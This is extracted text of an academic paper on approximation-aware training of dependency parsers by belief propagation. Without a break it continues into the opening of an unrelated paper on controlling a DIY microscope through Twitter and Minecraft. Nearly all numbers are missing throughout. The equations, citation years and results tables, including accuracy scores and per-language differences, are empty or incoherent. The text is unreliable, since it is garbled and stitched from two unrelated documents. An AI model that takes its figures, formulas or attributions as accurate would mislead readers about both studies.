pθ(yi = on |x) as input, or in practice, their bp approximations bi(on): q /t θ (ŷ |x) ∝ exp (∑ i:ŷi=on pθ(yi=on |x) t ) ( ) (e) decode and loss j(θ;x,y∗) = (e. ) expected recall (e. ) inside-outside (e. ) anneal beliefs (d) beliefs bi(yi) = . . ., bα(yα) = . . . (c) messages at time tmax m (tmax) i→α (yi) = . . ., m (tmax) α→i (yi) = . . . m (tmax) ptree→i(yi) = (c. ) outgoing messages (c. ) inside-outside (c. ) message ratios · · · (c) messages at time t m (t) i→α(yi) = . . ., m (t) α→i(yi) = . . . m (t) ptree→i(yi) = (c. ) outgoing messages (c. 
) inside-outside (c. ) message ratios · · · (c) messages at time t = m ( ) i→α(yi) = . . ., m ( ) α→i(yi) = . . . m ( ) ptree→i(yi) = (c. ) outgoing messages (c. ) inside-outside (c. ) message ratios (a) compute potentials ψα(yα) = exp(θ ·f(yα,x)) (b) initial messages m ( ) i→α(yi) = m ( ) α→i(yi) = (c. ) outgoing messages (c. ) inside-outside (c. ) message ratios (e. ) expected recall (e. ) inside-outside (e. ) anneal beliefs figure : feed-forward topology of inference, decoding, and loss. (e. –e. ) show the annealed risk, one of the objective functions we consider. using this distribution, we can replace our non- differentiable decoder hθ with a differentiable one (at training time). imagine that our new decoder stochastically returns a parse ŷ sampled from this distribution. we define the annealed risk as the ex- pected loss of that decoder: r /t θ (x,y ∗) = e ŷ∼q /t θ (· |x)[`(ŷ,y ∗)] ( ) as t → (“annealing”), the decoder almost always chooses the mbr parse, so our risk approaches the loss of the actual mbr decoder that will be used at test time. however, as a function of θ, it remains differentiable (though not convex) for any t > . to compute the annealed risk, observe that it sim- plifies to r /tθ (x,y ∗) = − ∑ i:y∗i =on q /t θ (ŷi = on |x). this is the negated expected recall of a parse ŷ ∼ q /tθ . we obtain the required marginals q /t θ (ŷi = on |x) from ( ) by running inside- recall from ( ) that the mbr parse is the tree ŷ that max- imizes the sum ∑ i:ŷi=on pθ(yi = on |x). as t → , the right-hand side of ( ) grows fastest for this ŷ, so its probabil- ity under q /tθ approaches (or /k if there is a k-way tie for mbr parse). outside where the edge weight for edge i is given by exp(pθ(yi = on |x)/t). whether our test-time system computes the marginals of pθ exactly or does so approximately via bp, our new training objective approaches (as t → ) the true empirical risk of the test-time parser that performs mbr decoding from the computed marginals. empirically, however, we will find that it is not the most effective training objective (§ . ). stoyanov et al. ( ) postulate that the nonconvex- ity of empirical risk may make it a difficult function to optimize, even with annealing. our next two ob- jectives provide alternatives. . l distance we can view our inference, decoder, and loss as defining a form of deep neural network, whose topology is inspired by our linguistic knowledge of the problem (e.g., the edge variables should define a tree). this connection to deep learning allows us to consider training methods akin to supervised layer-wise training (bengio et al., ). we tem- porarily remove the top layers of our network (i.e. the decoder and loss module, fig. (e)) so that the output layer of our “deep network” consists of the variable beliefs bi(yi) from bp. we can then de- fine a supervised loss function directly on these be- liefs. we don’t have supervised data for this layer of beliefs, but we can create it artificially. use the supervised parse y∗ to define “target beliefs” by b∗i (yi) = i(yi = y ∗ i ) ∈ { , }. to find parame- ters θ that make bp’s beliefs close to these targets, we can minimize an l distance loss function: j(θ;x,y∗) = ∑ i ∑ yi (bi(yi)− b∗i (yi)) ( ) we can use this l distance objective function for training, adding the mbr decoder and loss evalua- tion back in only at test time. . layer-wise training just as in layer-wise training of neural networks, we can take a two-stage approach to training. first, we train to minimize the l distance. 
then, we use the resulting θ as initialization to optimize the annealed risk, which does consider the decoder and loss func- tion (i.e. the top layers of fig. ). stoyanov et al. ( ) found mean squared error (mse) to give a smoother training objective, though still nonconvex, and used it to initialize empirical risk. though their variant of the l objective did not completely dis- pense with the decoder as ours does, it is a similar approach to our proposed layer-wise training. gradients by backpropagation backpropagation computes the derivative of any given function specified by an arbitrary circuit con- sisting of elementary differentiable operations (e.g. +,−,×,÷, log,exp). this is accomplished by re- peated application of the chain rule. backpropagat- ing through an algorithm proceeds by similar ap- plication of the chain rule, where the intermediate quantities are determined by the topology of the circuit—just as in figure . running backwards through the circuit, backprop computes the partial derivatives of the objective j(θ;x,y∗) with respect to each intermediate quantity u—or more concisely the adjoint of u: ðu = ∂j(θ;x,y ∗) ∂u . this section gives a summary of the adjoint computations we re- quire. due to space constraints, we direct the reader to the extended version of this paper (gormley et al., a) for full details of all the adjoints. . backpropagation of decoder / loss the adjoint of the objective itself ðj(θ;x,y∗) is al- ways . so the first adjoints we must compute are those of the beliefs: ðbi(yi) and ðbα(yα). this cor- responds to the backward pass through figure (e). consider the simple case where j is l distance from ( ): the variable belief adjoint is ðbi(yi) = (bi(yi)−b∗i (yi)) and trivially ðbα(yα) = . if j is annealed risk from ( ), we compute ðbi(yi) by ap- plying backpropagation recursively to our algorithm for j from § . . this sub-algorithm defines a sub- circuit depicted in figure (e. –e. ). the compu- tations of the annealed beliefs and the expected re- call are easily differentiable. the main challenge is differentiating the function computed by the inside- outside algorithm; we address this in § . . . backpropagation through structured bp given the adjoints of the beliefs, we next back- propagate through structured bp—extending prior work which did the same for regular bp (eaton and ghahramani, ; stoyanov et al., ; domke, ). except for the messages sent from the ptree factor, each step of bp computes some value from earlier values using the update equa- tions ( )–( ). backpropagation differentiates these elementary expressions. first, using the belief ad- joints, we compute the adjoints of the final mes- sages (ðm(tmax)j→α (yj), ðm (tmax) β→i (yi)) by applying the chain rule to eqs. ( ) and ( ). this is the backward pass through fig. (d). recall that the messages at time t were computed from messages at time t − and the potential functions ψα in the forward pass via eqs. ( ) and ( ). backprop works in the oppo- site order, updating the adjoints of the messages at time t− and the potential functions (ðm(t− )j→α (yj), ðm(t− )β→i (yi), ðψα(yα)) only after it has computed the adjoints of the messages at time t. repeating this through timesteps {t,t − , . . . , } constitutes the backward pass through fig. (c). the backward pass through fig. (b) does nothing, since the mes- sages were initialized to a constant. the final step of backprop uses ðψα(yα) to compute ðθj—the back- ward pass through fig. (a). for the explicit for- mula of these adjoints, see gormley et al. 
( a) or appendix a. of stoyanov et al. ( ). the next section handles the special case of ðm(t)j→ptree(yj). . bp and backpropagation with ptree the ptree factor has a special structure that we exploit for efficiency during bp. smith and eis- ner ( ) give a more efficient way to implement eq. ( ), which computes the message from a fac- tor α to a variable yi, in the special case where α = ptree. they first run the inside-outside al- gorithm where the edge weights are given by the ra- tios of the messages to ptree: m (t) i→α(on) m (t) i→α(off) . then they multiply each resulting edge marginal given by inside-outside by the product of all the off mes- sages ∏ i m (t) i→α(off) to get the marginal factor be- lief bα(yi). finally they divide the belief by the in- coming message m(t)i→α(on) to get the correspond- ing outgoing message m(t+ )α→i (on). these steps are shown in figure (c. –c. ), and are repeated each time we send a message from the ptree factor. similarly, we exploit the structure of this algo- rithm to compute the adjoints ðm(t)j→ptree(yj). the derivatives of the message ratios and products men- tioned here are simple. in the next subsection, we explain how to backpropagate through the inside- outside algorithm. though we focus here on pro- jective dependency parsing, our techniques are also applicable to non-projective parsing and the tree factor; we leave this to future work. . backprop of hypergraph inside-outside both the annealed risk loss function (§ . ) and the computation of messages from the ptree factor (§ . ) use the inside-outside algorithm for depen- dency parsing. here we describe inside-outside and the accompanying backpropagation algorithm over a hypergraph. this general treatment (klein and man- ning, ; li and eisner, ) enables our method to be applied to other tasks such as constituency parsing, hmm forward-backward, and hierarchical machine translation. in the case of dependency pars- ing, the structure of the hypergraph is given by the dynamic programming algorithm of eisner ( ). for the forward pass of the inside-outside mod- ule, the input variables are the hyperedge weights we∀e and the outputs are the marginal probabilities pw(i)∀i of each node i in the hypergraph. the latter are a function of the inside βi and outside αj proba- bilities. we initialize αroot = . βi = ∑ e∈i(i) we ∏ j∈t(e) βj ( ) αj = ∑ e∈o(i) we αh(e) ∏ j∈t(e):j =i βj ( ) pw(i) = αiβi/βroot ( ) for each node i, we define the set of incoming edges i(i) and outgoing edges o(i). the antecedents of the edge are t(e), the parent of the edge is h(e), and its weight is we. for the backward pass of the inside-outside module, the inputs are ðpw(i)∀i and the outputs are ðwe∀e. we also compute the adjoints of the inter- mediate quantities ðβj,ðαi. we first compute ðαi bottom-up. next ðβj are computed top-down. the adjoints ðwe are then computed in any order. ðαi = ðpw(i) ∂pw(i) ∂αi + ∑ e∈i(i) ∑ j∈t(e) ðαj ∂αj ∂αi ( ) ðβroot = ∑ i =root ðpw(i) ∂pw(i) ∂βroot ( ) ðβj = ðpw(j) ∂pw(j) ∂βj + ∑ e∈o(j) ðβh(e) ∂βh(e) ∂βj + ∑ e∈o(j) ∑ k∈t(e):k =j ðαk ∂αk∂βj ∀j = root ( ) ðwe = ðβh(e) ∂βh(e) ∂we + ∑ j∈t(e) ðαj ∂αj ∂we ( ) the partial derivatives required for the above ad- joints are given in the extended version of this pa- per (gormley et al., a). this backpropagation method is used for both figure (c. ) and (e. ). other learning settings loss-aware training with exact inference backpropagating through inference, decoder, and loss need not be restricted to approximate inference algorithms. 
li and eisner ( ) optimize bayes risk with exact inference on a hypergraph for machine translation. each of our differentiable loss functions (§ ) can also be coupled with exact inference. for a first-order parser, bp is exact. yet, in place of modules (b), (c), and (d) in figure , we can use a standard dynamic programming algorithm for dependency parsing, which is simply another instance of inside-outside on a hypergraph (§ . ). the exact marginals from inside-outside ( ) are then fed forward into the decoder/loss module (e). conditional and surrogate log-likelihood the standard approach to training is conditional log- likelihood (cll) maximization (smith and eisner, ) without taking inexact inference into account: j(θ;x,y∗) = − log pθ(y |x). when inference is exact, this baseline computes the true gradient of cll. when inference is approximate, this base- line uses the factor beliefs bα(yα) from bp in place of the exact marginals in the gradient. the liter- ature refers to this approximation-unaware training method as surrogate likelihood training since it re- turns the “wrong” parameters even under the as- sumption of infinite training data drawn from the model being used (wainwright, ). despite this, the surrogate likelihood objective is commonly used to train crfs. cll and approximation-aware train- ing are not mutually exclusive. training a standard factor graph with erma and a log-likelihood objec- tive recovers cll exactly (stoyanov et al., ). experiments . setup features as the focus of this work is on a novel approach to training, we look to prior work for model and feature design (§ ). we add o(n ) second-order grandparent and arbitrary-sibling fac- tors as in riedel and smith ( ) and martins et al. ( ). we use standard feature sets for first-order (mcdonald et al., ) and second-order (carreras, ) parsing. following rush and petrov ( ), we also include a version of each part-of-speech (pos) tag feature, with the coarse tags from petrov et al. ( ). we use feature hashing (ganchev and dredze, ; weinberger et al., ) and restrict to at most million features. we leave the incor- poration of third-order features to future work. pruning to reduce the time spent on feature ex- traction, we enforce the type-specific dependency length bounds from eisner and smith ( ) as used by rush and petrov ( ): the maximum allowed dependency length for each tuple (parent tag, child tag, direction) is given by the maximum observed length for that tuple in the training data. follow- ing koo and collins ( ), we train a first-order model with cll and for each token prune any par- ents for which the marginal probability is less than . times the maximum parent marginal for that token. on a per-token basis, we further restrict to the ten parents with highest marginal probability as in martins et al. ( ) (but we avoid pruning the fully right-branching tree, so that some parse always exists). this lets us simplify the factor graph, re- moving variables yi corresponding to pruned edges and specializing their factors to assume yi = off. we train the full model’s parameters to work well on this pruned graph. data we consider languages from the conll- (buchholz and marsi, ) and conll- (nivre et al., ) shared tasks. we also convert the english penn treebank (ptb) (marcus et al., ) to dependencies using the head rules from ya- mada and matsumoto ( ) (ptb-ym). we evalu- ate unlabeled attachment accuracy (uas) using gold the pruning model uses a simpler feature set as in rush and petrov ( ). 
pruning is likely the least impactful of our approximations: it obtains . % oracle uas for english. . . . . . . u a s # iterations of bp cll l l +ar figure : speed/accuracy tradeoff of english ptb-ym uas vs. the total number of bp iterations tmax for standard conditional likelihood training (cll) and our approximation-aware training with either an l objective (l ) or a staged training of l followed by annealed risk (l +ar). note that the x-axis shows the number of iter- ations used for both training and testing. we use a nd- order model with grand.+sib. factors. pos tags for the conll languages, and predicted tags from turbotagger (martins et al., ) for the ptb. unlike most prior work, we hold out % of each conll training dataset as development data for regularization by early stopping. some of the conll languages contain non- projective edges, but our system is built using a probability distribution over projective trees only. erma can still be used with such a badly misspec- ified model—one of its advantages—but no amount of training can raise cll’s objective above −∞, since any non-projective gold tree will always have probability . thus, for cll only, we replace each gold tree in training data with a minimum-loss projective tree (carreras, ). this resembles erma’s goal of training the system to find a low- loss projective tree. at test time, we always evaluate the system’s projective output trees against the pos- sibly non-projective gold trees, as in prior work. learning settings we compare three learning set- tings. the first, our baseline, is conditional log- in dev experiments, we found l distance to be less sensi- tive to the ` -regularizer weight than cll. so we added addi- tional regularization by early stopping to improve cll. we also ran a controlled experiment with l and not just cll trained on these projectivized trees: the average margin of improvement for our method widened very slightly. . . . unary grand. sib. grand.+sib. u a s cll l l +ar figure : english ptb-ym uas vs. the types of nd- order factors included in the model for approximation- aware training and standard conditional likelihood train- ing. all models include st-order factors (unary). the nd-order models include grandparents (grand.), arbi- trary siblings (sib.), or both (grand.+sib.)—and use iterations of bp. likelihood training (cll) (§ ). as is common in the literature, we conflate two distinct learning settings (conditional log-likelihood/surrogate log- likelihood) under the single name “cll,” allowing the inference method (exact/inexact) to differentiate them. the second learning setting is approximation- aware learning (§ ) with either our l distance ob- jective (l ) (§ . ) or our layer-wise training method (l +ar) which takes the l -trained model as an ini- tializer for our annealed risk (§ . ). the annealed risk objective requires an annealing schedule: over the course of training, we linearly anneal from ini- tial temperature t = . to t = . , updat- ing t at each step of stochastic optimization. the third learning setting uses the same two objectives, l and l +ar, but with exact inference (§ ). the ` -regularizer weight in ( ) is λ = . each method is trained by adagrad for epochs with early stopping (i.e. the model with the highest score on dev data is returned). across conll, the average epoch chosen for cll was . and for l was . . the learning rate for each training run is dynamically tuned on a sample of the training data. . 
results our goal is to demonstrate that our approximation- aware training method leads to improved parser ac- curacy as compared with the standard training ap- proach of conditional log-likelihood (cll) maxi- mization (smith and eisner, ), which does not take inexact inference into account. the two key findings of our experiments are that our learning ap- proach is more robust to ( ) decreasing the number of iterations of bp and ( ) adding additional cycles to the factor graph in the form of higher-order fac- tors. in short: our approach leads to faster inference and creates opportunities for more accurate parsers. speed-accuracy tradeoff our first experiment is on english dependencies. for english ptb-ym, figure shows accuracy as a function of the num- ber of bp iterations for our second-order model with both arbitrary sibling and grandparent factors on en- glish. we find that our training methods (l and l +ar) obtain higher accuracy than standard train- ing (cll), particularly when a small number of bp iterations are used and the inference is a worse ap- proximation. notice that with just two iterations of bp, the parsers trained by our approach obtain ac- curacy greater than or equal to those by cll with any number of iterations ( to ). contrasting the two objectives for our approximation-aware train- ing, we find that our simple l objective performs very well. in fact, in only two cases, at and itera- tions, does risk annealing (l +ar) further improve performance on test data. in our development exper- iments, we also evaluated ar without using l for initialization and we found that it performed worse than either of cll and l alone. that ar performs only slightly better than l (and not worse) in the case of l +ar is likely due to early stopping on dev data, which guards against selecting a worse model. increasingly cyclic models figure contrasts accuracy with the type of nd-order factors (grand- parent, sibling, or both) included in the model for english, for a fixed budget of bp iterations. adding higher-order factors introduces more loops, making the loopy bp approximation more problem- atic for standard cll training. by contrast, under approximation-aware training, enriching the model with more factors always helps performance, as de- sired, rather than hurting it. notice that our advantage is not restricted to the case of loopy graphs. even when we use a st- order model, for which bp inference is exact, our approach yields higher-accuracy parsers than cll training. we speculate that this improvement is due to our method’s ability to better deal with model train inference dev uas test uas cll exact . . cll bp iters . . l exact . . l bp iters . . table : the impact of exact vs. approximate inference on a nd-order model with grandparent factors only. re- sults are for the development (§ ) and test (§ ) sec- tions of ptb-ym. misspecification—a first-order model is quite mis- specified! note the following subtle point: when inference is exact, the cll estimator is actually a special case of our approximation-aware learner— that is, cll computes the same gradient that our training by backpropagation would if we used log- likelihood as the objective. exact inference with grandparents § noted that since we always do mbr decoding, the ideal strategy is to fit the true distribution with a good model. consider a “good model” that includes unary and grandparent factors. exact inference is possible here in o(n ) time by dynamic programming (koo and collins, , model ). 
table shows that cll training with exact inference indeed does well on test data—but that accuracy falls if we substitute fast approximate inference ( iterations of bp). our proposed l training is able to close the gap, just as intended. that is, we succesfully train a few itera- tions of an approximate o(n ) algorithm to behave as well as an exact o(n ) algorithm. other languages our final experiments train and test our parsers on languages from conll- / (table ). we find that, on average across languages, approximation-aware training with an l objective obtains higher uas than cll training. this result holds for both our poorest model ( st- order) and our richest one ( nd-order with grandpar- ent and sibling factors), using , , , or iterations of bp. notice that the approximation-aware train- ing doesn’t always outperform cll training—only in the aggregate. again, we see the trend that our training approach yields larger gains when bp is re- stricted to a small number of maximum iterations. it is possible that larger training sets would also favor our approach, by providing a clearer signal of how to reduce the objective ( ). st-order nd-order (with given num. bp iterations) language cll l − cll cll l − cll cll l − cll cll l − cll cll l − cll ar . - . . + . . - . . + . . - . bg . - . . - . . + . . + . . - . ca . + . . + . . + . . + . . + . cs . - . . + . . + . . + . . + . da . - . . - . . + . . - . . - . de . + . . . . + . . - . . - . el . - . . + . . + . . - . . - . en . + . . + . . + . . + . . + . es . - . . - . . + . . - . . + . eu . + . . + . . + . . - . . - . hu . - . . + . . + . . + . . + . it . + . . + . . + . . - . . - . ja . + . . + . . - . . - . . + . nl . + . . + . . + . . - . . - . pt . + . . - . . + . . + . . + . sl . + . . + . . + . . + . . + . sv . + . . - . . + . . + . . + . tr . - . . - . . - . . - . . - . zh . - . . + . . + . . + . . + . avg. . + . . + . . + . . + . . + . table : results on languages from conll- / . for languages appearing in both datasets, the version was used, except for chinese (zh). evaluation follows the conventions and excludes punctuation. we report absolute uas for the baseline (cll) and the improvement in uas for l over cll (l − cll) with positive/negative differences in blue/red. the average uas and average difference across all languages (avg.) is given. discussion the purpose of this work was to explore erma and related training methods for models which incorpo- rate structured factors. we applied these methods to a basic higher-order dependency parsing model, because that was the simplest and first instance of structured bp (smith and eisner, ). in future work, we hope to explore further models with struc- tured factors—particularly those which jointly ac- count for multiple linguistic strata (e.g. syntax, se- mantics, and topic). another natural extension of this work is to explore other types of factors: here we considered only log-linear potential functions (com- monly used in crfs), but any differentiable func- tion would be appropriate, such as a neural network (durrett and klein, ; gormley et al., b). our primary contribution is approximation-aware training for structured bp. we have specifically presented message-passing formulas for any factor whose belief’s partition function can be computed as the total weight of all hyperpaths in a weighted hypergraph. 
this would suffice to train the struc- tured bp systems that have been built for projective dependency parsing (smith and eisner, ), cnf grammar parsing (naradowsky et al., ), tag (auli and lopez, ), itg-constraints for phrase extraction (burkett and klein, ), and graphical models over strings (dreyer and eisner, ). conclusions we introduce a new approximation-aware learning framework for belief propagation with structured factors. we present differentiable objectives for both empirical risk minimization (à la erma) and a novel objective based on l distance between the in- ferred beliefs and the true edge indicator functions. experiments on the english penn treebank and languages from conll- / shows that our estimator is able to train more accurate dependency parsers with fewer iterations of belief propagation than standard conditional log-likelihood training, by taking approximations into account. for additional details, see the tech report version of this paper (gormley et al., a). our code is available in a general-purpose library for structured bp, hyper- graphs, and backprop (gormley, ). acknowledgments this research was funded by the human language technology center of excel- lence at johns hopkins university. thanks to the anonymous reviewers for their insightful comments. references michael auli and adam lopez. . a comparison of loopy belief propagation and dual decomposition for integrated ccg supertagging and parsing. in proceed- ings of acl. mohit bansal, david burkett, gerard de melo, and dan klein. . structured learning for taxonomy induc- tion with belief propagation. in proceedings of acl. yoshua bengio, pascal lamblin, dan popovici, and hugo larochelle. . greedy layer-wise training of deep networks. in b. schölkopf, j.c. platt, and t. hoffman, editors, advances in neural information processing systems . peter j. bickel and kjell a. doksum. . mathe- matical statistics: basic ideas and selected topics. holden-day inc., oakland, ca, usa. sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proceedings of conll. david burkett and dan klein. . fast inference in phrase extraction models with belief propagation. in proceedings of naacl-hlt. xavier carreras. . experiments with a higher-order projective dependency parser. in proceedings of the conll shared task session of emnlp-conll . justin domke. . implicit differentiation by pertur- bation. in advances in neural information processing systems. justin domke. . parameter learning with truncated message-passing. in proceedings of the ieee con- ference on computer vision and pattern recognition (cvpr). markus dreyer and jason eisner. . graphical mod- els over multiple strings. in proceedings of emnlp. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research. greg durrett and dan klein. . neural crf parsing. in proceedings of acl. frederik eaton and zoubin ghahramani. . choos- ing a variable to clamp. in proceedings of aistats. jason eisner and noah a. smith. . parsing with soft and hard constraints on dependency length. in proceedings of the international workshop on parsing technologies (iwpt). jason eisner. . three new probabilistic models for dependency parsing: an exploration. in proceedings of coling. brendan j. frey, frank r. kschischang, hans-andrea loeliger, and niclas wiberg. . factor graphs and algorithms. 
in proceedings of the annual allerton conference on communication control and comput- ing, volume . kuzman ganchev and mark dredze. . small sta- tistical models by random feature mixing. in proceed- ings of the acl hlt workshop on mobile language processing. joshua goodman. . efficient algorithms for parsing the dop model. in proceedings of emnlp. matthew r. gormley, mark dredze, and jason eis- ner. a. approximation-aware dependency parsing by belief propagation (extended version). technical report available from arxiv.org as arxiv: . . matthew r. gormley, mo yu, and mark dredze. b. improved relation extraction with feature-rich com- positional embedding models. in proceedings of emnlp. matthew r. gormley. . pacaya—a graphical mod- els and nlp library. available from https:// github.com/mgormley/pacaya. andreas griewank and george f. corliss, editors. . automatic differentiation of algorithms: theory, im- plementation, and application. siam, philadelphia, pa. liang huang, suphan fayong, and yang guo. . structured perceptron with inexact search. in proceed- ings of naacl-hlt. dan klein and christopher d. manning. . parsing and hypergraphs. in proceedings of the international workshop on parsing technologies (iwpt). terry koo and michael collins. . efficient third- order dependency parsers. in proceedings of acl. frank r. kschischang, brendan j. frey, and hans- andrea loeliger. . factor graphs and the sum- product algorithm. ieee transactions on information theory, ( ). alex kulesza and fernando pereira. . structured learning with approximate inference. in advances in neural information processing systems. zhifei li and jason eisner. . first- and second-order expectation semirings with applications to minimum- risk training on translation forests. in proceedings of emnlp. mitchell p. marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ). arxiv.org https://github.com/mgormley/pacaya https://github.com/mgormley/pacaya andré f. t. martins, noah a. smith, and eric p. xing. . concise integer linear programming formula- tions for dependency parsing. in proceedings of acl- ijcnlp. andré f. t. martins, noah a. smith, eric p. xing, pe- dro m. q. aguiar, and mário a. t. figueiredo. . turbo parsers: dependency parsing by approximate variational inference. in proceedings of emnlp. andré f. t. martins, miguel b. almeida, and noah a. smith. . turning on the turbo: fast third-order non-projective turbo parsers. in proceedings of acl. ryan mcdonald and fernando pereira. . on- line learning of approximate dependency parsing al- gorithms. in proceedings of eacl. ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in proceedings of acl. kevin p. murphy, yair weiss, and michael i. jordan. . loopy belief propagation for approximate in- ference: an empirical study. in proceedings of uai. jason naradowsky, tim vieira, and david a. smith. . grammarless parsing for joint inference. in proceedings of coling. joakim nivre, johan hall, sandra kübler, ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proceedings of the conll shared task session of emnlp-conll . slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proceedings of lrec. sebastian riedel and david a. smith. . relaxed marginal inference and its application to dependency parsing. in proceedings of naacl-hlt. 
david e. rumelhart, geoffrey e. hinton, and ronald j. williams. . learning internal representations by error propagation. in david e. rumelhart and james l. mcclelland, editors, parallel distributed processing: explorations in the microstructure of cognition, volume . mit press. alexander m. rush and slav petrov. . vine pruning for efficient multi-pass dependency parsing. in pro- ceedings of naacl-hlt. david a. smith and jason eisner. . minimum-risk annealing for training log-linear models. in proceed- ings of coling-acl. david a. smith and jason eisner. . dependency parsing by belief propagation. in proceedings of emnlp. veselin stoyanov and jason eisner. . minimum-risk training of approximate crf-based nlp systems. in proceedings of naacl-hlt. veselin stoyanov, alexander ropson, and jason eis- ner. . empirical risk minimization of graphi- cal model parameters given approximate inference, de- coding, and model structure. in proceedings of ais- tats. martin j. wainwright. . estimating the “wrong” graphical model: benefits in the computation-limited setting. the journal of machine learning research, . kilian weinberger, anirban dasgupta, john langford, alex smola, and josh attenberg. . feature hash- ing for large scale multitask learning. in proceedings of icml. hiroyasu yamada and yuji matsumoto. . statistical dependency analysis with support vector machines. in proceedings of the international workshop on parsing technologies (iwpt), volume . submitted february accepted november published december corresponding author andrew e. pelling, a@pellinglab.net, apelling@uottawa.ca academic editor feng xia additional information and declarations can be found on page doi . /peerj-cs. copyright leblanc-latour et al. distributed under creative commons cc-by . open access utilizing social media and video games to control #diy microscopes maxime leblanc-latour , craig bryan and andrew e. pelling , , , department of physics, university of ottawa, ottawa, ontario, canada department of biology, university of ottawa, ottawa, ontario, canada institute for science, society and policy, university of ottawa, ottawa, ontario, canada symbiotica and the school of anatomy, physiology and human biology, university of western australia, perth, western australia, australia abstract open-source lab equipment is becoming more widespread with the popularization of fabrication tools such as d printers, laser cutters, cnc machines, open source microcontrollers and open source software. although many pieces of common laboratoryequipmenthavebeendeveloped,softwarecontroloftheseitemsissometimes lacking. specifically, control software that can be easily implemented and enable user-input and control over multiple platforms (pc, smartphone, web, etc.). the aim of this proof-of principle study was to develop and implement software for the control of a low-cost, d printed microscope. here, we present two approaches which enable microscope control by exploiting the functionality of the social media platform twitter or player actions inside of the videogame minecraft. the microscope was constructed from a modified web-camera and implemented on a raspberry pi computer. three aspects of microscope control were tested, including single image capture, focus control and time-lapse imaging. the twitter embodiment enabled users to send ‘tweets’ directly to the microscope. 
image data acquired by the microscope was then returned to the user through a twitter reply and stored permanently on the photo-sharing platform flickr, along with any relevant metadata. local control of the microscope was also implemented by utilizing the video game minecraft, in situations where internet connectivity is not present or stable. a virtual laboratory was constructed inside the minecraft world and player actions inside the laboratory were linked to specific microscope functions. here, we present the methodology and results of these experiments and discuss possible limitations and future extensions of this work. subjects network science and online social networks, social computing keywords microscope, do-it-yourself, open source, raspberry pi, twitter, flickr introduction the general interest in using and developing low cost, open source labware is gaining considerable traction in garages, academic labs and commercial spaces (baden et al., ; keulartz & van den belt, ). this is largely being driven by the so-called ‘‘maker movement’’ in which people are now exploiting the widespread popularity and accessibility of fabrication tools ( d printers, laser cutters, cnc machines, etc.) and open source electronics (arduino, raspberry pi, etc) to build simple and advanced scientific equipment how to cite this article leblanc-latour et al. ( ), utilizing social media and video games to control #diy microscopes. peerj com- put. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:a@pellinglab.net mailto:apelling@uottawa.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. for a diversity of applications (pearce, ). designs and instructions are shared freely, typically under some form of open source license, and generally undergo several rounds of improvement as a result of the contributions from other users. importantly, such innovations have matured to a level that it is possible to setup a basic, functional, laboratory space at extremely low cost. in addition, the spirit of ‘‘frugal science’’ has led to several innovations in low cots diagnostic tools, often built around cell phone platforms. these approaches have the important potential for lowering the cost of diagnosis and treatment of diseases in both developed and developing countries. in the context of the biological sciences, the ‘‘do-it-yourself biology (diybio) movement’’hasdriven thedevelopmentofseveral toolsthatarecritical inanycell/molecular biology laboratory (landrain et al., ). this includes open source pipettes (baden, ), centrifuges (wong et al., ), water baths (garvey, ), stirrers and hot plates (watts, ), shakers (miller, ), electrophoresis kits (long, ), incubators (pelling, ), pcr (chai biotechnologies inc., a; wong et al., ) and qpcr (chai biotechnologies inc., b) machines, and low cost kits for manipulating dna or transforming bacteria (synbiota, ). one other key piece of equipment is a light microscope. several designs and approaches have been developed for creating low cost light microscopes with reasonable magnification (cybulski, clements & prakash, ). such designs have resulted in microscopes that can operate in a variety of modalities including bright field, dark field and fluorescence (cybulski, clements & prakash, ; mcleod & ozcan, ). 
cellphone-based microscopes have been developed in which the phone's camera is simply employed as the imaging sensor (contreras-naranjo, wei & ozcan, ). these approaches either mount a low-cost set of optics directly to the cellphone camera (zhu et al., ) or mount the cell phone onto a simplified microscope stand that employs microscope objectives (skandarajah et al., ). alternatively, discarded webcams can be converted into a microscope by taking apart the camera and simply flipping the lens in front of the imaging sensor (switz, d'ambrosio & fletcher, ), or by placing a low-cost ball lens in front of an imaging sensor or the eye (smith et al., ). lenses can also be sourced from a discarded cd-rom drive or an optical mouse (cavanihac, ; ibanez, ). the ability to generate functional, low-cost microscopes is made more attractive as they can be produced from discarded electronics. indeed, the simplest embodiment of a diy microscope can be achieved by simply placing a water drop on the cellphone's front-facing camera. these various approaches are not only important for educational purposes, but also have a significant role to play in developing low-cost diagnostic tools for the lab or the field (landrain et al., ; baden, ; wong et al., ; garvey, ; watts, ; miller, ; long, ; pelling, ; chai biotechnologies inc., a; wong et al., ; chai biotechnologies inc., b; synbiota, ; cybulski, clements & prakash, ; mcleod & ozcan, ; contreras-naranjo, wei & ozcan, ; zhu et al., ; skandarajah et al., ; switz, d'ambrosio & fletcher, ; smith et al., ; cavanihac, ; ibanez, ; kim, gerber & riedel-kruse, ). as low-cost imaging tools (and general labware) become more prevalent, there is an increasing need for the development of software control and monitoring solutions. in order to employ a diy microscope in a research setting, one may desire the ability to conduct imaging experiments without having to be physically present at the microscope in order to initiate image capture, for example, when conducting time-lapse experiments of cell growth on a microscope that has been placed inside of a sterile, temperature- and atmospherically-controlled incubator. therefore, the purpose and objective of this study was to develop a general proof-of-principle approach and physical embodiment of diy microscope control that relies on freely available programs that can be installed on a pc or cellphone. in order to achieve these goals, we first constructed a basic diy microscope by modifying the popular raspberry pi (rpi) camera to act as an objective (switz, d'ambrosio & fletcher, ). a d printed case for the rpi computer and camera was designed and constructed to form a microscope stand. finally, a dvd-rom drive was used to create a moveable sample stage, allowing for focus control. sample positioning along the optical axis of the microscope and image capture was controlled by a python script. once the diy microscope was constructed, we developed user interfaces by exploiting three popular existing applications and their available application program interfaces (apis). here, we demonstrate the ability to use the popular twitter interface to send commands to an internet-connected diy microscope. we also implemented online data storage by uploading captured images, along with important metadata, to the photo-sharing network flickr.
